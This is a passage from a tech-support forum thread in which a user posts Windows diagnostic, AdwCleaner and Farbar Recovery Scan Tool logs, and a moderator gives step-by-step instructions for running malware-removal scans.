S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2018-4-11 61848]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 PNPMEM;Microsoft Memory Module Driver;C:\WINDOWS\System32\drivers\pnpmem.sys [2018-4-11 16896]
S3 PushToInstall;Windows PushToInstall Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 Ramdisk;Windows RAM Disk Driver;C:\WINDOWS\System32\drivers\ramdisk.sys [2018-4-11 39840]
S3 ReFS;ReFS;C:\WINDOWS\System32\drivers\refs.sys [2018-8-17 1921944]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2018-8-17 945568]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k rdxgroup [2018-4-11 51288]
S3 rhproxy;Resource Hub proxy driver;C:\WINDOWS\System32\drivers\rhproxy.sys [2018-4-11 104448]
S3 RTL8168;Realtek 8168 NT Driver;C:\WINDOWS\System32\drivers\Rt630x64.sys [2018-8-16 690832]
S3 SandraAgentSrv;SiSoftware Deployment Agent Service;C:\Program Files\SiSoftware\SiSoftware Sandra Lite Titanium.RTMa\RpcAgentSrv.exe [2018-9-14 136192]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2018-4-11 51288]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2018-8-17 128920]
S3 SDFRd;SDF Reflector;C:\WINDOWS\System32\drivers\SDFRd.sys [2018-4-11 33176]
S3 SEMgrSvc;Payments and NFC/SE Manager;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2018-4-11 1273344]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2018-4-11 154528]
S3 SharedRealitySvc;Spatial Data Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SmbDrv;SmbDrv;C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [2012-8-24 41272]
S3 SmbDrvI;SmbDrvI;C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [2012-8-24 43832]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2018-4-11 51288]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 SpatialGraphFilter;Holographic Spatial Graph Filter;C:\WINDOWS\System32\drivers\SpatialGraphFilter.sys [2018-4-11 57752]
S3 spectrum;Windows Perception Service;C:\WINDOWS\System32\Spectrum.exe [2018-8-17 976384]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2018-8-17 105368]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2018-8-17 48544]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2018-4-11 303616]
S3 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2018-4-11 128512]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2018-4-11 152576]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2018-4-11 57856]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2018-4-11 45056]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2018-8-17 29600]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2018-4-11 282008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2018-4-11 98200]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2018-4-11 144288]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2018-4-11 29088]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2018-4-11 67992]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2018-4-11 28064]
S3 VacSvc;Volumetric Audio Compositor Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2018-4-11 35328]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2018-8-17 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2018-4-11 51288]
S3 WaaSMedicSvc;Windows Update Medic Service;C:\WINDOWS\System32\svchost.exe -k wusvcs -p [2018-4-11 51288]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2018-4-11 82944]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2018-8-17 781824]
S3 WdmCompanionFilter;WdmCompanionFilter;C:\WINDOWS\System32\drivers\WdmCompanionFilter.sys [2018-4-11 21408]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2018-4-11 32152]
S3 WinNat;Windows NAT Driver;C:\WINDOWS\System32\drivers\winnat.sys [2018-8-17 227840]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2018-4-11 64920]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2018-4-11 264192]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2018-8-17 295424]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2018-4-11 46592]
S4 hvcrash;hvcrash;C:\WINDOWS\System32\drivers\hvcrash.sys [2018-4-11 33184]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S4 ssh-agent;OpenSSH Authentication Agent;C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [2018-4-12 495616]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: opera.exe: open="C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2018-10-09 08:44:41 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{765F7C9F-1CB4-4B4B-A7B4-9A30AEF02AB2}\mpengine.dll
2018-10-09 07:07:14 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2018-10-04 07:15:04 -------- d-----w- C:\Program Files (x86)\Ruiware
2018-10-04 07:15:03 -------- d-----w- C:\ProgramData\InstallMate
2018-09-30 05:31:57 -------- d-----w- C:\WINDOWS\SysWow64\wdegbma
2018-09-29 02:10:59 -------- d-----w- C:\Program Files (x86)\Microsoft ASP.NET
2018-09-28 04:42:44 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\CEF
2018-09-28 04:42:24 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Facebook
2018-09-25 06:22:32 -------- d-----w- C:\WINDOWS\Panther
2018-09-22 17:04:38 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Cyberlink
2018-09-20 10:13:39 1821184 ----a-w- C:\WINDOWS\System32\IDTNC64.cpl
2018-09-20 10:12:31 542208 ----a-w- C:\WINDOWS\System32\drivers\stwrt64.sys
2018-09-20 10:12:30 499200 ----a-w- C:\WINDOWS\System32\stcplx64.dll
2018-09-20 10:12:29 671744 ------w- C:\WINDOWS\System32\stapi64.dll
2018-09-20 10:12:29 255488 ----a-w- C:\WINDOWS\System32\st646425.dll
2018-09-20 10:12:29 2188800 ----a-w- C:\WINDOWS\System32\stapo64.dll
2018-09-20 10:12:14 -------- d-----w- C:\Program Files\IDT
2018-09-20 08:42:02 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\AppEx Networks
2018-09-20 08:37:15 228032 ----a-w- C:\WINDOWS\System32\drivers\appexDrv.sys
2018-09-20 08:37:14 -------- d-----w- C:\Program Files\AMD Quick Stream
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\Common Files\ATI Technologies
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\AMD AVT
2018-09-20 08:35:42 -------- d-----w- C:\Program Files\ATI Technologies
2018-09-20 08:23:04 -------- d-----w- C:\AMD
2018-09-14 10:29:33 -------- d-----w- C:\T32768
2018-09-14 09:13:17 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Roaming\AMD
2018-09-14 08:39:12 -------- d-----w- C:\ProgramData\Package Cache
2018-09-14 08:38:25 -------- d-----w- C:\Program Files\SiSoftware
2018-09-12 09:46:59 2172928 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
.
==================== Find3M ====================
.
2018-10-06 07:18:38 65536 ----a-w- C:\WINDOWS\System32\spu_storage.bin
2018-09-25 06:33:29 60584 ----a-w- C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys
2018-09-25 06:33:28 46184 ----a-w- C:\WINDOWS\System32\drivers\wd\WdBoot.sys
2018-09-25 06:33:28 352424 ----a-w- C:\WINDOWS\System32\drivers\wd\WdFilter.sys
2018-09-04 23:04:15 835144 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2018-09-04 23:04:15 179808 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2018-08-31 07:46:43 542504 ----a-w- C:\WINDOWS\System32\pcasvc.dll
2018-08-31 07:45:55 348328 ----a-w- C:\WINDOWS\System32\MusNotifyIcon.exe
2018-08-31 07:43:10 1524152 ----a-w- C:\WINDOWS\System32\msctf.dll
2018-08-31 07:42:49 1636232 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2018-08-31 07:27:25 56320 ----a-w- C:\WINDOWS\System32\mf3216.dll
2018-08-31 07:27:10 178176 ----a-w- C:\WINDOWS\System32\t2embed.dll
2018-08-31 07:26:21 101888 ----a-w- C:\WINDOWS\System32\drivers\bowser.sys
2018-08-31 07:25:18 270336 ----a-w- C:\WINDOWS\System32\spp.dll
2018-08-31 07:25:12 266752 ----a-w- C:\WINDOWS\System32\rstrui.exe
2018-08-31 07:24:35 482304 ----a-w- C:\WINDOWS\System32\srcore.dll
2018-08-31 07:24:33 1127936 ----a-w- C:\WINDOWS\System32\nettrace.dll
2018-08-31 07:23:48 1364992 ----a-w- C:\WINDOWS\System32\bcastdvruserservice.dll
2018-08-31 07:23:34 765440 ----a-w- C:\WINDOWS\System32\tdh.dll
2018-08-31 07:22:53 1855488 ----a-w- C:\WINDOWS\System32\msxml3.dll
2018-08-31 07:22:19 1661440 ----a-w- C:\WINDOWS\System32\GdiPlus.dll
2018-08-31 06:55:04 1455960 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2018-08-31 06:53:26 1327504 ----a-w- C:\WINDOWS\SysWow64\msctf.dll
2018-08-31 06:41:56 43008 ----a-w- C:\WINDOWS\SysWow64\mf3216.dll
2018-08-31 06:41:34 138752 ----a-w- C:\WINDOWS\SysWow64\t2embed.dll
2018-08-31 06:40:01 216576 ----a-w- C:\WINDOWS\SysWow64\spp.dll
2018-08-31 06:37:50 622080 ----a-w- C:\WINDOWS\SysWow64\tdh.dll
2018-08-31 06:37:13 1585664 ----a-w- C:\WINDOWS\SysWow64\msxml3.dll
2018-08-31 06:36:04 1469952 ----a-w- C:\WINDOWS\SysWow64\GdiPlus.dll
2018-08-31 03:50:07 270648 ----a-w- C:\WINDOWS\System32\SgrmEnclave_secure.dll
2018-08-31 03:50:05 273720 ----a-w- C:\WINDOWS\System32\SgrmEnclave.dll
2018-08-31 03:44:28 1222440 ----a-w- C:\WINDOWS\System32\hvix64.exe
2018-08-31 03:44:27 1030952 ----a-w- C:\WINDOWS\System32\hvax64.exe
2018-08-31 03:44:22 76256 ----a-w- C:\WINDOWS\System32\drivers\hvservice.sys
2018-08-31 03:44:19 1064744 ----a-w- C:\WINDOWS\System32\SecConfig.efi
2018-08-31 03:44:18 568600 ----a-w- C:\WINDOWS\System32\tcblaunch.exe
2018-08-31 03:44:15 136488 ----a-w- C:\WINDOWS\System32\hvloader.dll
2018-08-31 03:43:40 722880 ----a-w- C:\WINDOWS\System32\ci.dll
2018-08-31 03:43:19 2719216 ----a-w- C:\WINDOWS\System32\drivers\tcpip.sys
2018-08-31 03:28:56 1989496 ----a-w- C:\WINDOWS\SysWow64\msxml6.dll
2018-08-31 03:28:50 1514352 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2018-08-31 03:28:44 6043680 ----a-w- C:\WINDOWS\SysWow64\windows.storage.dll
2018-08-31 03:28:42 134936 ----a-w- C:\WINDOWS\SysWow64\gdi32.dll
2018-08-31 03:28:38 6570040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2018-08-31 03:28:37 453104 ----a-w- C:\WINDOWS\SysWow64\dpx.dll
2018-08-31 03:28:24 1129728 ----a-w- C:\WINDOWS\SysWow64\msvproc.dll
2018-08-31 03:28:20 568568 ----a-w- C:\WINDOWS\SysWow64\CoreMessaging.dll
2018-08-31 03:26:44 25847808 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2018-08-31 03:21:14 22008320 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2018-08-31 03:18:30 8189440 ----a-w- C:\WINDOWS\System32\Windows.Data.Pdf.dll
2018-08-31 03:17:08 144384 ----a-w- C:\WINDOWS\System32\mssprxy.dll
2018-08-31 03:17:01 20480 ----a-w- C:\WINDOWS\System32\netevent.dll
2018-08-31 03:16:47 6661120 ----a-w- C:\WINDOWS\SysWow64\Windows.Data.Pdf.dll
2018-08-31 03:16:03 4382720 ----a-w- C:\WINDOWS\System32\EdgeContent.dll
2018-08-31 03:15:44 4866560 ----a-w- C:\WINDOWS\System32\jscript9.dll
2018-08-31 03:15:40 3392512 ----a-w- C:\WINDOWS\System32\tquery.dll
2018-08-31 03:15:13 7577088 ----a-w- C:\WINDOWS\System32\Chakra.dll
2018-08-31 03:15:07 894464 ----a-w- C:\WINDOWS\System32\webplatstorageserver.dll
2018-08-31 03:15:03 395776 ----a-w- C:\WINDOWS\System32\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:15:02 75776 ----a-w- C:\WINDOWS\System32\drivers\mpsdrv.sys
2018-08-31 03:14:53 2700288 ----a-w- C:\WINDOWS\SysWow64\tquery.dll
2018-08-31 03:14:50 154112 ----a-w- C:\WINDOWS\System32\Chakradiag.dll
2018-08-31 03:14:42 898560 ----a-w- C:\WINDOWS\System32\WpcWebFilter.dll
2018-08-31 03:14:31 808448 ----a-w- C:\WINDOWS\System32\EdgeManager.dll
2018-08-31 03:14:26 726528 ----a-w- C:\WINDOWS\System32\jscript9diag.dll
2018-08-31 03:13:19 402432 ----a-w- C:\WINDOWS\System32\drivers\ks.sys
2018-08-31 03:13:07 2738688 ----a-w- C:\WINDOWS\System32\mssrch.dll
2018-08-31 03:13:01 1708544 ----a-w- C:\WINDOWS\System32\MSPhotography.dll
2018-08-31 03:12:51 736256 ----a-w- C:\WINDOWS\System32\drivers\srv2.sys
2018-08-31 03:12:36 20480 ----a-w- C:\WINDOWS\SysWow64\netevent.dll
2018-08-31 03:11:38 796672 ----a-w- C:\WINDOWS\System32\mssvp.dll
2018-08-31 03:11:29 2236928 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2018-08-31 03:11:19 1854976 ----a-w- C:\WINDOWS\System32\wevtsvc.dll
2018-08-31 03:11:18 1057792 ----a-w- C:\WINDOWS\System32\SearchIndexer.exe
2018-08-31 03:11:11 604160 ----a-w- C:\WINDOWS\System32\updatehandlers.dll
2018-08-31 03:11:07 406528 ----a-w- C:\WINDOWS\System32\SearchProtocolHost.exe
2018-08-31 03:10:55 608768 ----a-w- C:\WINDOWS\SysWow64\EdgeManager.dll
2018-08-31 03:10:55 1375744 ----a-w- C:\WINDOWS\System32\usocore.dll
2018-08-31 03:10:49 3711488 ----a-w- C:\WINDOWS\SysWow64\jscript9.dll
2018-08-31 03:10:45 5777920 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2018-08-31 03:10:42 889344 ----a-w- C:\WINDOWS\System32\schedsvc.dll
2018-08-31 03:10:40 288768 ----a-w- C:\WINDOWS\SysWow64\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:10:28 1361408 ----a-w- C:\WINDOWS\SysWow64\MSPhotography.dll
2018-08-31 03:10:27 561152 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2018-08-31 03:10:26 176640 ----a-w- C:\WINDOWS\System32\mssph.dll
2018-08-31 03:09:58 578560 ----a-w- C:\WINDOWS\SysWow64\webplatstorageserver.dll
2018-08-31 03:09:23 2258944 ----a-w- C:\WINDOWS\SysWow64\mssrch.dll
2018-08-31 03:08:28 619520 ----a-w- C:\WINDOWS\SysWow64\WpcWebFilter.dll
2018-08-31 03:07:32 856064 ----a-w- C:\WINDOWS\SysWow64\SearchIndexer.exe
2018-08-31 03:07:14 735744 ----a-w- C:\WINDOWS\SysWow64\mssvp.dll
2018-08-31 0357 345088 ----a-w- C:\WINDOWS\SysWow64\SearchProtocolHost.exe
2018-08-30 04:44:37 152688 ----a-w- C:\WINDOWS\System32\drivers\mbae64.sys
2018-08-28 09:27:28 1952768 ----a-w- C:\WINDOWS\NDE2ZDRjZ.exe
2018-08-28 07:17:55 23862784 ----a-w- C:\WINDOWS\System32\Hydrogen.dll
2018-08-28 06:56:08 1008640 ----a-w- C:\WINDOWS\System32\Windows.Media.MixedRealityCapture.dll
2018-08-28 06:49:46 677376 ----a-w- C:\WINDOWS\System32\HeadTrackerStorage.dll
2018-08-28 06:48:22 1274368 ----a-w- C:\WINDOWS\System32\HoloSI.PCShell.dll
2018-08-28 06:45:57 713216 ----a-w- C:\WINDOWS\System32\SharedRealitySvc.dll
2018-08-28 05:51:14 868864 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.MixedRealityCapture.dll
2018-08-18 00:47:08 563832 ------w- C:\WINDOWS\System32\MpSigStub.exe
.
============= FINISH: 2010.54 ===============
Attached Files
File Type: txt attach.txt (11.1 KB, 7 views)
angelgabbby is offline  
Sponsored Links
Advertisement
 
Old 10-10-2018, 03:28 AM   #2
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

Please download AdwCleaner from here and save it to your desktop.
  • Run AdwCleaner and select Scan Now
  • Once the Scan is done, select Clean & Repair
  • When prompted, select Clean & Restart Now
  • On reboot, a log will be produced. It can also be found at C:\AdwCleaner\Logs\AdwCleaner[C0#].txt
  • Please copy/paste the contents of the log in your next reply.
------------------------------------------------------

Please download Farbar Recovery Scan Tool and save it to your desktop.
  • Double-click FRST64 to run it. When the tool opens click Yes to the disclaimer.
  • Make sure the Addition.txt button is ticked.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • It also makes another log (Addition.txt). Please attach it to your reply.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-10-2018, 04:54 PM   #3
Registered Member
 
Join Date: Jun 2007
Location: Tulsa, Oklahoma
Posts: 36
OS: 10



ADWCLEANER'S--------

# -------------------------------
# Malwarebytes AdwCleaner 7.2.3.0
# -------------------------------
# Build: 08-30-2018
# Database: (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 10-10-2018
# Duration: 00:00:13
# OS: Windows 10 Home
# Cleaned: 1
# Failed: 0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [3563 octets] - [29/08/2018 01:27:16]
AdwCleaner[C00].txt - [3159 octets] - [29/08/2018 01:29:24]
AdwCleaner[S01].txt - [1433 octets] - [10/10/2018 18:16:59]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########



FARBAR---------

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10.10.2018
Ran by Christopher&Gabriell (administrator) on GABBYSNOTEBOOK (10-10-2018 18:41:47)
Running from C:\Users\Christopher&Gabriell\Desktop
Loaded Profiles: Christopher&Gabriell (Available Profiles: Christopher&Gabriell)
Platform: Windows 10 Home Version 1803 17134.345 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Opera)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1809.2-0\MsMpEng.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1809.2-0\NisSrv.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(ALCPU) C:\Program Files\Core Temp\Core Temp.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Corporation) C:\Windows\System32\CastSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Ruiware) C:\Program Files (x86)\Ruiware\WinPatrol\WinPatrol.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera_crashreporter.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-11] (Microsoft Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-04-28] (Synaptics Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2012-08-19] (IDT, Inc.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2012-09-14] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-09-15] (Advanced Micro Devices, Inc.)
HKU\S-1-5-21-2942939960-1714500650-1008813090-1002\...\Run: [WinPatrol] => C:\Program Files (x86)\Ruiware\WinPatrol\winpatrol.exe [1223560 2017-05-07] (Ruiware)
HKU\S-1-5-21-2942939960-1714500650-1008813090-1002\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Mystify.scr [149504 2018-04-11] (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{982D5C35-5D95-44B3-84D9-0D16030AAD83}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12

Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-2942939960-1714500650-1008813090-1002 -> DefaultScope {585D9B7B-5172-4702-AD1E-BD0C4BBF4A16} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-2942939960-1714500650-1008813090-1002 -> {585D9B7B-5172-4702-AD1E-BD0C4BBF4A16} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
DPF: HKLM-x32 {0E5F0222-96B9-11D3-8997-00104BD12D94} hxxp://www.pcpitstop.com/nirvana/controls/pcmatic.cab
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2018-02-14] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-06-12] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2018-02-14] (Microsoft Corporation)
